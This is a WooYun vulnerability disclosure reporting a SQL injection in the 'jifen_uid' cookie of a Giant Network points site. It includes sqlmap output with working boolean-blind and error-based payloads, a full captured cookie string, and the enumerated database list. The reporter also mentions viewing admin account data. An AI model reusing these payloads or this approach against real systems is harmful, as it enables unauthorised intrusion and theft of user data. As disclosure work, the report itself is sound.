当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117620

漏洞标题:巨人网络某站SQL注入(涉及大量数据以及表)

相关厂商:巨人网络

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-02 09:19

修复时间:2015-06-07 09:20

公开时间:2015-06-07 09:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

本来想测试能不能无限兑换的 结果却意外发现了一个注入点

1.png


参数 jifen_uid 未过滤 丢进 sqlmap 里跑了下

2.png


总共7个数据库 但是涉及大量数据以及表(看了两个数据库 一个 cd 还有一个 vip cd 里面的数据如图 有两个表每个8千多万条信息···而vip这个数据里有两千多张表 我就没跑了 直接看了个 admin_user 的表的数据 其中有 51 个账号)

3.png


4.png


5.png


漏洞证明:

Cookie parameter 'jifen_uid' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] n
sqlmap identified the following injection points with a total of 9312 HTTP(s) re
quests:
---
Place: Cookie
Parameter: jifen_uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref
=0; date=2015-05-29+11:24:35; ref_date=2015-05-29+11:24:35; ref_ip=42.81.42.133;
 check_cookie_jsztgamecom=123; _jslog_logininfo_yzd=eyIzNTM4OTc0MzYiOlsiMzUzODk3
NDM2IiwiMjAxNS0wNi0wMSAyMTo1NToyOCIsMiwiTlVMTCIsIk5VTEwiXX0=; jifen_uid=35389743
6 AND 5585=5585; jifen_account=wooyun124; jifen_hash=590b4a1b2b7ffe53156b76c819e
dc78f; jiathis_rdc={"http://jf.ztgame.com/share.php?uid=353897436%26url=http%3A%
2F%2Fjf.ztgame.com":"0|1433167006973"}
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref
=0; date=2015-05-29+11:24:35; ref_date=2015-05-29+11:24:35; ref_ip=42.81.42.133;
 check_cookie_jsztgamecom=123; _jslog_logininfo_yzd=eyIzNTM4OTc0MzYiOlsiMzUzODk3
NDM2IiwiMjAxNS0wNi0wMSAyMTo1NToyOCIsMiwiTlVMTCIsIk5VTEwiXX0=; jifen_uid=35389743
6 AND (SELECT 7983 FROM(SELECT COUNT(*),CONCAT(0x7177636a71,(SELECT (CASE WHEN (
7983=7983) THEN 1 ELSE 0 END)),0x7177777571,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a); jifen_account=wooyun124; jifen_hash=590b4a1
b2b7ffe53156b76c819edc78f; jiathis_rdc={"http://jf.ztgame.com/share.php?uid=3538
97436%26url=http%3A%2F%2Fjf.ztgame.com":"0|1433167006973"}
---
[22:47:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.4.4
back-end DBMS: MySQL 5.0
[22:47:55] [INFO] fetching database names
[22:47:55] [INFO] the SQL query used returns 7 entries
[22:47:55] [INFO] retrieved: information_schema
[22:47:55] [INFO] retrieved: cb
[22:47:55] [INFO] retrieved: logs
[22:47:55] [INFO] retrieved: mysql
[22:47:55] [INFO] retrieved: performance_schema
[22:47:55] [INFO] retrieved: test
[22:47:55] [INFO] retrieved: vip
available databases [7]:
[*] cb
[*] information_schema
[*] logs
[*] mysql
[*] performance_schema
[*] test
[*] vip

修复方案:

有礼物不?

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-07 09:20

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无